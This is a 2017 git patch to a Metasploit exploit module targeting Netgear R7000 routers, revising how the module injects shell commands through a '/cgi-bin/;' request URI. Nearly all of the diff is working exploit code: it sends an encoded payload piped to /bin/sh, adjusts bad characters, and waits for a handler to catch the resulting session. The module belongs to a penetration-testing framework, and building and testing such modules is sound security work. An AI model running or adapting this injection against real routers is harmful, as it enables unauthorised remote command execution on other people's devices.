From 63d1de9acd0286b4b64ceac9cb0908eb3e7f06f0 Mon Sep 17 00:00:00 2001
From: Carter <cbawsome77@gmail.com>
Date: Fri, 17 Feb 2017 18:29:46 -0500
Subject: [PATCH] Updates from review

Also testing some things, line 84 and 85 mostly
---
 .../linux/http/netgear_r7000_cgibin_exec.rb        | 14 +++++++-------
 1 file changed, 7 insertions(+), 7 deletions(-)

diff --git a/modules/exploits/linux/http/netgear_r7000_cgibin_exec.rb b/modules/exploits/linux/http/netgear_r7000_cgibin_exec.rb
index 60a3b72d47..240e4f22fe 100644
--- a/modules/exploits/linux/http/netgear_r7000_cgibin_exec.rb
+++ b/modules/exploits/linux/http/netgear_r7000_cgibin_exec.rb
@@ -38,8 +38,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'Payload'        =>
         {
           'Space'       => 1024,
-          'DisableNops' => true
-          #'EncoderType' => Msf::Encoder::Type::CmdUnixIfs,
+          'DisableNops' => true,
+          'BadChars'    => "\x20"	
         }
     ))
 
@@ -81,16 +81,16 @@ class MetasploitModule < Msf::Exploit::Remote
   # Mostly from ddwrt_cgibin_exec.rb, it's essentially the same exploit
   def exploit
     is_vuln = check
-    cmd = payload.encoded.unpack("C*").map{|c| "\\x%.2x" % c}.join
-    str = "echo${IFS}-ne${IFS}\"#{cmd}\"|/bin/sh&"
+    cmd = payload.encoded # .unpack("C*").map{|c| "\\x%.2x" % c}.join
+    #str = "echo${IFS}-ne${IFS}\"#{cmd}\"|/bin/sh&"
 
     print_status('Sending encoded command...')
-    vprint_status("Encoded command: #{str}")
-    send_request_raw({ 'uri' => "/cgi-bin/;#{str}" })
+    vprint_status("Encoded command: #{cmd}")
+    send_request_cgi({ 'uri' => "/cgi-bin/;#{cmd}" })
 
     print_status('Giving the handler time to run...')
     handler
 
-    select(nil, nil, nil, 10.0)
+    sleep(10)
   end
 end